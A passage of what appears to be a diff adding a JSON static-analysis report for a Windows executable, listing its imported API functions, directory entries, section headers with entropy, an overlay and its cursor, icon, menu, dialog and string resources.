"GetMessagePos" + }, + { + "address": "0x447610", + "name": "GetForegroundWindow" + }, + { + "address": "0x447614", + "name": "SetForegroundWindow" + }, + { + "address": "0x447618", + "name": "OffsetRect" + }, + { + "address": "0x44761c", + "name": "IntersectRect" + }, + { + "address": "0x447620", + "name": "SystemParametersInfoA" + }, + { + "address": "0x447624", + "name": "GetWindowPlacement" + }, + { + "address": "0x447628", + "name": "GetSystemMetrics" + }, + { + "address": "0x44762c", + "name": "GetLastActivePopup" + }, + { + "address": "0x447630", + "name": "IsWindowVisible" + }, + { + "address": "0x447634", + "name": "IsIconic" + }, + { + "address": "0x447638", + "name": "GetFocus" + }, + { + "address": "0x44763c", + "name": "EqualRect" + }, + { + "address": "0x447640", + "name": "CopyRect" + }, + { + "address": "0x447644", + "name": "GetDlgItem" + }, + { + "address": "0x447648", + "name": "GetKeyState" + }, + { + "address": "0x44764c", + "name": "LoadStringA" + }, + { + "address": "0x447650", + "name": "UnregisterClassA" + }, + { + "address": "0x447654", + "name": "HideCaret" + }, + { + "address": "0x447658", + "name": "ShowCaret" + }, + { + "address": "0x44765c", + "name": "ExcludeUpdateRgn" + }, + { + "address": "0x447660", + "name": "DrawFocusRect" + }, + { + "address": "0x447664", + "name": "DefDlgProcA" + }, + { + "address": "0x447668", + "name": "IsWindowUnicode" + }, + { + "address": "0x44766c", + "name": "LoadStringW" + }, + { + "address": "0x447670", + "name": "UpdateWindow" + }, + { + "address": "0x447674", + "name": "EnableWindow" + }, + { + "address": "0x447678", + "name": "GetDlgCtrlID" + }, + { + "address": "0x44767c", + "name": "UnpackDDElParam" + }, + { + "address": "0x447680", + "name": "ReuseDDElParam" + }, + { + "address": "0x447684", + "name": "SetActiveWindow" + }, + { + "address": "0x447688", + "name": "WinHelpA" + }, + { + "address": "0x44768c", + "name": "SetMenu" + }, + { + "address": "0x447690", + "name": "LoadIconA" + }, + { + "address": "0x447694", + "name": "GetClassInfoA" + }, + { + "address": "0x447698", + "name": "LoadMenuA" + }, + { + "address": "0x44769c", + "name": "DestroyMenu" + }, + { + "address": "0x4476a0", + "name": "SetFocus" + }, + { + "address": "0x4476a4", + "name": "ShowWindow" + }, + { + "address": "0x4476a8", + "name": "GetDesktopWindow" + }, + { + "address": "0x4476ac", + "name": "GetWindow" + }, + { + "address": "0x4476b0", + "name": "IsWindowEnabled" + }, + { + "address": "0x4476b4", + "name": "DestroyIcon" + }, + { + "address": "0x4476b8", + "name": "GetMenuStringA" + }, + { + "address": "0x4476bc", + "name": "InsertMenuA" + }, + { + "address": "0x4476c0", + "name": "DispatchMessageA" + }, + { + "address": "0x4476c4", + "name": "LockWindowUpdate" + }, + { + "address": "0x4476c8", + "name": "SetCursor" + }, + { + "address": "0x4476cc", + "name": "PeekMessageA" + }, + { + "address": "0x4476d0", + "name": "GetClientRect" + }, + { + "address": "0x4476d4", + "name": "GetDC" + }, + { + "address": "0x4476d8", + "name": "ReleaseDC" + }, + { + "address": "0x4476dc", + "name": "SetCapture" + }, + { + "address": "0x4476e0", + "name": "ReleaseCapture" + }, + { + "address": "0x4476e4", + "name": "InvalidateRect" + }, + { + "address": "0x4476e8", + "name": "CloseClipboard" + }, + { + "address": "0x4476ec", + "name": "SetClipboardData" + }, + { + "address": "0x4476f0", + "name": "EmptyClipboard" + }, + { + "address": "0x4476f4", + "name": "OpenClipboard" + }, + { + "address": "0x4476f8", + "name": "GetWindowRect" + }, + { + "address": "0x4476fc", + "name": "GetSubMenu" + }, + { + "address": "0x447700", + "name": "GetMenuItemCount" + }, + { + "address": "0x447704", + "name": "GetMenu" + }, + { + "address": "0x447708", + "name": "BringWindowToTop" + }, + { + "address": "0x44770c", + "name": "CreateWindowExA" + }, + { + "address": "0x447710", + "name": "DefFrameProcA" + }, + { + "address": "0x447714", + "name": "TranslateMDISysAccel" + }, + { + "address": "0x447718", + "name": "TranslateAcceleratorA" + }, + { + "address": "0x44771c", + "name": "DrawMenuBar" + }, + { + "address": "0x447720", + "name": "SendMessageA" + }, + { + "address": "0x447724", + "name": "DefMDIChildProcA" + }, + { + "address": "0x447728", + "name": "IsWindow" + }, + { + "address": "0x44772c", + "name": "SetWindowLongA" + }, + { + "address": "0x447730", + "name": "GetWindowLongA" + }, + { + "address": "0x447734", + "name": "SetWindowPos" + }, + { + "address": "0x447738", + "name": "RedrawWindow" + }, + { + "address": "0x44773c", + "name": "AdjustWindowRectEx" + }, + { + "address": "0x447740", + "name": "GetMenuItemID" + }, + { + "address": "0x447744", + "name": "GetParent" + }, + { + "address": "0x447748", + "name": "wsprintfA" + }, + { + "address": "0x44774c", + "name": "GetActiveWindow" + }, + { + "address": "0x447750", + "name": "RegisterWindowMessageA" + }, + { + "address": "0x447754", + "name": "SetRectEmpty" + }, + { + "address": "0x447758", + "name": "LoadAcceleratorsA" + }, + { + "address": "0x44775c", + "name": "PostMessageA" + }, + { + "address": "0x447760", + "name": "GetCapture" + }, + { + "address": "0x447764", + "name": "ScreenToClient" + } + ] + }, + "GDI32": { + "dll": "GDI32.dll", + "imports": [ + { + "address": "0x447044", + "name": "CreateCompatibleDC" + }, + { + "address": "0x447048", + "name": "CreateCompatibleBitmap" + }, + { + "address": "0x44704c", + "name": "DeleteObject" + }, + { + "address": "0x447050", + "name": "GetCharWidthA" + }, + { + "address": "0x447054", + "name": "CreateFontA" + }, + { + "address": "0x447058", + "name": "GetDeviceCaps" + }, + { + "address": "0x44705c", + "name": "PatBlt" + }, + { + "address": "0x447060", + "name": "GetStockObject" + }, + { + "address": "0x447064", + "name": "Rectangle" + }, + { + "address": "0x447068", + "name": "DPtoLP" + }, + { + "address": "0x44706c", + "name": "CreatePen" + }, + { + "address": "0x447070", + "name": "GetViewportOrgEx" + }, + { + "address": "0x447074", + "name": "AbortDoc" + }, + { + "address": "0x447078", + "name": "EndDoc" + }, + { + "address": "0x44707c", + "name": "EndPage" + }, + { + "address": "0x447080", + "name": "StartPage" + }, + { + "address": "0x447084", + "name": "StartDocA" + }, + { + "address": "0x447088", + "name": "SetAbortProc" + }, + { + "address": "0x44708c", + "name": "CreateDCA" + }, + { + "address": "0x447090", + "name": "SaveDC" + }, + { + "address": "0x447094", + "name": "RestoreDC" + }, + { + "address": "0x447098", + "name": "SetBkMode" + }, + { + "address": "0x44709c", + "name": "SetPolyFillMode" + }, + { + "address": "0x4470a0", + "name": "SetROP2" + }, + { + "address": "0x4470a4", + "name": "SetStretchBltMode" + }, + { + "address": "0x4470a8", + "name": "SetMapMode" + }, + { + "address": "0x4470ac", + "name": "SetViewportOrgEx" + }, + { + "address": "0x4470b0", + "name": "OffsetViewportOrgEx" + }, + { + "address": "0x4470b4", + "name": "SetViewportExtEx" + }, + { + "address": "0x4470b8", + "name": "ScaleViewportExtEx" + }, + { + "address": "0x4470bc", + "name": "SetWindowOrgEx" + }, + { + "address": "0x4470c0", + "name": "SetWindowExtEx" + }, + { + "address": "0x4470c4", + "name": "ScaleWindowExtEx" + }, + { + "address": "0x4470c8", + "name": "SelectClipRgn" + }, + { + "address": "0x4470cc", + "name": "ExcludeClipRect" + }, + { + "address": "0x4470d0", + "name": "IntersectClipRect" + }, + { + "address": "0x4470d4", + "name": "MoveToEx" + }, + { + "address": "0x4470d8", + "name": "LineTo" + }, + { + "address": "0x4470dc", + "name": "SetTextAlign" + }, + { + "address": "0x4470e0", + "name": "StretchDIBits" + }, + { + "address": "0x4470e4", + "name": "CreateRectRgn" + }, + { + "address": "0x4470e8", + "name": "GetViewportExtEx" + }, + { + "address": "0x4470ec", + "name": "GetWindowExtEx" + }, + { + "address": "0x4470f0", + "name": "CreateSolidBrush" + }, + { + "address": "0x4470f4", + "name": "CreatePatternBrush" + }, + { + "address": "0x4470f8", + "name": "PtVisible" + }, + { + "address": "0x4470fc", + "name": "RectVisible" + }, + { + "address": "0x447100", + "name": "TextOutA" + }, + { + "address": "0x447104", + "name": "ExtTextOutA" + }, + { + "address": "0x447108", + "name": "Escape" + }, + { + "address": "0x44710c", + "name": "CreateFontIndirectA" + }, + { + "address": "0x447110", + "name": "BitBlt" + }, + { + "address": "0x447114", + "name": "GetMapMode" + }, + { + "address": "0x447118", + "name": "SetRectRgn" + }, + { + "address": "0x44711c", + "name": "CombineRgn" + }, + { + "address": "0x447120", + "name": "CreateRectRgnIndirect" + }, + { + "address": "0x447124", + "name": "GetTextColor" + }, + { + "address": "0x447128", + "name": "GetBkColor" + }, + { + "address": "0x44712c", + "name": "LPtoDP" + }, + { + "address": "0x447130", + "name": "GetNearestColor" + }, + { + "address": "0x447134", + "name": "GetStretchBltMode" + }, + { + "address": "0x447138", + "name": "GetPolyFillMode" + }, + { + "address": "0x44713c", + "name": "GetTextAlign" + }, + { + "address": "0x447140", + "name": "GetBkMode" + }, + { + "address": "0x447144", + "name": "GetROP2" + }, + { + "address": "0x447148", + "name": "GetTextFaceA" + }, + { + "address": "0x44714c", + "name": "GetWindowOrgEx" + }, + { + "address": "0x447150", + "name": "DeleteDC" + }, + { + "address": "0x447154", + "name": "GetTextMetricsA" + }, + { + "address": "0x447158", + "name": "SelectObject" + }, + { + "address": "0x44715c", + "name": "GetTextExtentPoint32A" + }, + { + "address": "0x447160", + "name": "CreateBitmap" + }, + { + "address": "0x447164", + "name": "GetObjectA" + }, + { + "address": "0x447168", + "name": "SetBkColor" + }, + { + "address": "0x44716c", + "name": "SetTextColor" + }, + { + "address": "0x447170", + "name": "GetClipBox" + }, + { + "address": "0x447174", + "name": "GetPixel" + }, + { + "address": "0x447178", + "name": "ChoosePixelFormat" + }, + { + "address": "0x44717c", + "name": "DescribePixelFormat" + }, + { + "address": "0x447180", + "name": "SetPixelFormat" + }, + { + "address": "0x447184", + "name": "GetCurrentPositionEx" + }, + { + "address": "0x447188", + "name": "CreateDIBitmap" + }, + { + "address": "0x44718c", + "name": "GetTextExtentPointA" + }, + { + "address": "0x447190", + "name": "SwapBuffers" + } + ] + }, + "comdlg32": { + "dll": "comdlg32.dll", + "imports": [ + { + "address": "0x44777c", + "name": "GetSaveFileNameA" + }, + { + "address": "0x447780", + "name": "PrintDlgA" + }, + { + "address": "0x447784", + "name": "GetOpenFileNameA" + }, + { + "address": "0x447788", + "name": "GetFileTitleA" + }, + { + "address": "0x44778c", + "name": "CommDlgExtendedError" + } + ] + }, + "WINSPOOL": { + "dll": "WINSPOOL.DRV", + "imports": [ + { + "address": "0x44776c", + "name": "OpenPrinterA" + }, + { + "address": "0x447770", + "name": "DocumentPropertiesA" + }, + { + "address": "0x447774", + "name": "ClosePrinter" + } + ] + }, + "ADVAPI32": { + "dll": "ADVAPI32.dll", + "imports": [ + { + "address": "0x447000", + "name": "RegQueryValueExA" + }, + { + "address": "0x447004", + "name": "RegSetValueA" + }, + { + "address": "0x447008", + "name": "RegCreateKeyA" + }, + { + "address": "0x44700c", + "name": "GetFileSecurityA" + }, + { + "address": "0x447010", + "name": "SetFileSecurityA" + }, + { + "address": "0x447014", + "name": "RegDeleteValueA" + }, + { + "address": "0x447018", + "name": "RegSetValueExA" + }, + { + "address": "0x44701c", + "name": "RegQueryValueA" + }, + { + "address": "0x447020", + "name": "RegOpenKeyExA" + }, + { + "address": "0x447024", + "name": "RegCreateKeyExA" + }, + { + "address": "0x447028", + "name": "RegDeleteKeyA" + }, + { + "address": "0x44702c", + "name": "RegOpenKeyA" + }, + { + "address": "0x447030", + "name": "RegEnumKeyA" + }, + { + "address": "0x447034", + "name": "RegCloseKey" + } + ] + }, + "SHELL32": { + "dll": "SHELL32.dll", + "imports": [ + { + "address": "0x447494", + "name": "SHGetFileInfoA" + }, + { + "address": "0x447498", + "name": "DragAcceptFiles" + }, + { + "address": "0x44749c", + "name": "DragQueryFileA" + }, + { + "address": "0x4474a0", + "name": "DragFinish" + }, + { + "address": "0x4474a4", + "name": "ExtractIconA" + } + ] + }, + "COMCTL32": { + "dll": "COMCTL32.dll", + "imports": [] + }, + "oledlg": { + "dll": "oledlg.dll", + "imports": [] + }, + "ole32": { + "dll": "ole32.dll", + "imports": [ + { + "address": "0x447794", + "name": "CoFreeUnusedLibraries" + }, + { + "address": "0x447798", + "name": "OleUninitialize" + }, + { + "address": "0x44779c", + "name": "OleInitialize" + }, + { + "address": "0x4477a0", + "name": "CoTaskMemAlloc" + }, + { + "address": "0x4477a4", + "name": "CoTaskMemFree" + }, + { + "address": "0x4477a8", + "name": "CreateILockBytesOnHGlobal" + }, + { + "address": "0x4477ac", + "name": "StgCreateDocfileOnILockBytes" + }, + { + "address": "0x4477b0", + "name": "StgOpenStorageOnILockBytes" + }, + { + "address": "0x4477b4", + "name": "CoGetClassObject" + }, + { + "address": "0x4477b8", + "name": "CLSIDFromString" + }, + { + "address": "0x4477bc", + "name": "CLSIDFromProgID" + }, + { + "address": "0x4477c0", + "name": "CoRegisterMessageFilter" + }, + { + "address": "0x4477c4", + "name": "CoRevokeClassObject" + }, + { + "address": "0x4477c8", + "name": "OleFlushClipboard" + }, + { + "address": "0x4477cc", + "name": "OleIsCurrentClipboard" + } + ] + }, + "OLEPRO32": { + "dll": "OLEPRO32.DLL", + "imports": [] + }, + "OLEAUT32": { + "dll": "OLEAUT32.dll", + "imports": [ + { + "address": "0x4473ac", + "name": "SysFreeString" + }, + { + "address": "0x4473b0", + "name": "SysAllocStringLen" + }, + { + "address": "0x4473b4", + "name": "VariantClear" + }, + { + "address": "0x4473b8", + "name": "VariantTimeToSystemTime" + }, + { + "address": "0x4473bc", + "name": "VariantCopy" + }, + { + "address": "0x4473c0", + "name": "VariantChangeType" + }, + { + "address": "0x4473c4", + "name": "SysAllocString" + }, + { + "address": "0x4473c8", + "name": "SysAllocStringByteLen" + }, + { + "address": "0x4473cc", + "name": "SysStringLen" + } + ] + } + }, + "exported_dll_name": null, + "exports": [], + "dirents": [ + { + "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", + "virtual_address": "0x000551a8", + "size": "0x0000012c" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", + "virtual_address": "0x00063000", + "size": "0x0001ee28" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_TLS", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_IAT", + "virtual_address": "0x00047000", + "size": "0x000007dc" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", + "virtual_address": "0x00000000", + "size": "0x00000000" + } + ], + "sections": [ + { + "name": ".text", + "raw_address": "0x00001000", + "virtual_address": "0x00001000", + "virtual_size": "0x00045629", + "size_of_data": "0x00046000", + "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ", + "characteristics_raw": "0x60000020", + "entropy": "6.57" + }, + { + "name": ".rdata", + "raw_address": "0x00047000", + "virtual_address": "0x00047000", + "virtual_size": "0x00010aa6", + "size_of_data": "0x00011000", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", + "characteristics_raw": "0x40000040", + "entropy": "4.56" + }, + { + "name": ".data", + "raw_address": "0x00058000", + "virtual_address": "0x00058000", + "virtual_size": "0x0000ad88", + "size_of_data": "0x00007000", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", + "characteristics_raw": "0xc0000040", + "entropy": "5.58" + }, + { + "name": ".rsrc", + "raw_address": "0x0005f000", + "virtual_address": "0x00063000", + "virtual_size": "0x0001ee28", + "size_of_data": "0x0001f000", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", + "characteristics_raw": "0x40000040", + "entropy": "3.64" + } + ], + "overlay": { + "offset": "0x0007e000", + "size": "0x00049139" + }, + "resources": [ + { + "name": "RT_CURSOR", + "offset": "0x00065550", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.03" + }, + { + "name": "RT_CURSOR", + "offset": "0x00065688", + "size": "0x000000b4", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.74" + }, + { + "name": "RT_CURSOR", + "offset": "0x000661a8", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.58" + }, + { + "name": "RT_CURSOR", + "offset": "0x000662e0", + "size": "0x000000b4", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.58" + }, + { + "name": "RT_BITMAP", + "offset": "0x000647d0", + "size": "0x00000428", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.30" + }, + { + "name": "RT_BITMAP", + "offset": "0x00065768", + "size": "0x000005e4", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "4.10" + }, + { + "name": "RT_BITMAP", + "offset": "0x00065e38", + "size": "0x000000b8", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.24" + }, + { + "name": "RT_BITMAP", + "offset": "0x00065ef0", + "size": "0x0000016c", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.20" + }, + { + "name": "RT_BITMAP", + "offset": "0x00066060", + "size": "0x00000144", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.88" + }, + { + "name": "RT_ICON", + "offset": "0x00063f60", + "size": "0x000002e8", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.82" + }, + { + "name": "RT_ICON", + "offset": "0x00064248", + "size": "0x00000128", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.56" + }, + { + "name": "RT_ICON", + "offset": "0x00064398", + "size": "0x000002e8", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.40" + }, + { + "name": "RT_ICON", + "offset": "0x00064680", + "size": "0x00000128", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.69" + }, + { + "name": "RT_MENU", + "offset": "0x00064c18", + "size": "0x00000124", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.15" + }, + { + "name": "RT_MENU", + "offset": "0x00064d40", + "size": "0x000003aa", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.38" + }, + { + "name": "RT_DIALOG", + "offset": "0x00065160", + "size": "0x00000102", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.29" + }, + { + "name": "RT_DIALOG", + "offset": "0x00065d50", + "size": "0x000000e8", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.07" + }, + { + "name": "RT_DIALOG", + "offset": "0x000663c0", + "size": "0x0000011e", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.86" + }, + { + "name": "RT_DIALOG", + "offset": "0x000664e0", + "size": "0x0000015a", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.13" + }, + { + "name": "RT_STRING", + "offset": "0x0007f528", + "size": "0x00000078", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.38" + }, + { + "name": "RT_STRING", + "offset": "0x0006e320", + "size": "0x000010a4", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.36" + }, + { + "name": "RT_STRING", + "offset": "0x0006f3c8", + "size": "0x00000854", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.33" + }, + { + "name": "RT_STRING", + "offset": "0x00077878", + "size": "0x000018e0", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.37" + }, + { + "name": "RT_STRING", + "offset": "0x0007aa50", + "size": "0x0000109e", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.36" + }, + { + "name": "RT_STRING", + "offset": "0x0007baf0", + "size": "0x00000854", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.33" + }, + { + "name": "RT_STRING", + "offset": "0x00067f48", + "size": "0x00000df0", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.36" + }, + { + "name": "RT_STRING", + "offset": "0x00068d38", + "size": "0x00000b10", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.35" + }, + { + "name": "RT_STRING", + "offset": "0x00069848", + "size": "0x000018de", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.37" + }, + { + "name": "RT_STRING", + "offset": "0x0006fc20", + "size": "0x000018d4", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.37" + }, + { + "name": "RT_STRING", + "offset": "0x00066658", + "size": "0x0000002c", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "1.03" + }, + { + "name": "RT_STRING", + "offset": "0x00066688", + "size": "0x000018bc", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.36" + }, + { + "name": "RT_STRING", + "offset": "0x0006ca28", + "size": "0x00001618", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.37" + }, + { + "name": "RT_STRING", + "offset": "0x0006e040", + "size": "0x000002dc", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.24" + }, + { + "name": "RT_STRING", + "offset": "0x000714f8", + "size": "0x000018e4", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.37" + }, + { + "name": "RT_STRING", + "offset": "0x00075f90", + "size": "0x000018e8", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.37" + }, + { + "name": "RT_STRING", + "offset": "0x00072de0", + "size": "0x000018d0", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.37" + }, + { + "name": "RT_STRING", + "offset": "0x00079158", + "size": "0x00000b22", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.36" + }, + { + "name": "RT_STRING", + "offset": "0x00079c80", + "size": "0x00000dcc", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.35" + }, + { + "name": "RT_STRING", + "offset": "0x000806e8", + "size": "0x00000132", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.02" + }, + { + "name": "RT_STRING", + "offset": "0x000746b0", + "size": "0x000018de", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.37" + }, + { + "name": "RT_STRING", + "offset": "0x0007c348", + "size": "0x000018d6", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.37" + }, + { + "name": "RT_STRING", + "offset": "0x0007dc20", + "size": "0x000005c0", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.34" + }, + { + "name": "RT_STRING", + "offset": "0x0007e1e0", + "size": "0x00001344", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.36" + }, + { + "name": "RT_STRING", + "offset": "0x0006b128", + "size": "0x00000b2a", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.36" + }, + { + "name": "RT_STRING", + "offset": "0x0006bc58", + "size": "0x00000dcc", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.35" + }, + { + "name": "RT_STRING", + "offset": "0x0007f5a0", + "size": "0x00000032", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "1.48" + }, + { + "name": "RT_STRING", + "offset": "0x0007f620", + "size": "0x00000296", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.17" + }, + { + "name": "RT_STRING", + "offset": "0x0007f9c0", + "size": "0x00000260", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.91" + }, + { + "name": "RT_STRING", + "offset": "0x0007ff80", + "size": "0x00000328", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.20" + }, + { + "name": "RT_STRING", + "offset": "0x0007fd00", + "size": "0x0000027c", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.15" + }, + { + "name": "RT_STRING", + "offset": "0x0007f8b8", + "size": "0x00000106", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.99" + }, + { + "name": "RT_STRING", + "offset": "0x0007fc20", + "size": "0x000000da", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.84" + }, + { + "name": "RT_STRING", + "offset": "0x0007f5d8", + "size": "0x00000046", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.27" + }, + { + "name": "RT_STRING", + "offset": "0x000802a8", + "size": "0x000000c6", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.74" + }, + { + "name": "RT_STRING", + "offset": "0x00080370", + "size": "0x000001f8", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.05" + }, + { + "name": "RT_STRING", + "offset": "0x00080568", + "size": "0x000000ae", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.77" + }, + { + "name": "RT_STRING", + "offset": "0x00080618", + "size": "0x000000d0", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.08" + }, + { + "name": "RT_STRING", + "offset": "0x00080820", + "size": "0x0000002a", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "0.96" + }, + { + "name": "RT_STRING", + "offset": "0x00080850", + "size": "0x0000014a", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.05" + }, + { + "name": "RT_STRING", + "offset": "0x00081d00", + "size": "0x00000124", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.30" + }, + { + "name": "RT_STRING", + "offset": "0x000809a0", + "size": "0x000004e2", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.26" + }, + { + "name": "RT_STRING", + "offset": "0x00081218", + "size": "0x000002a2", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": 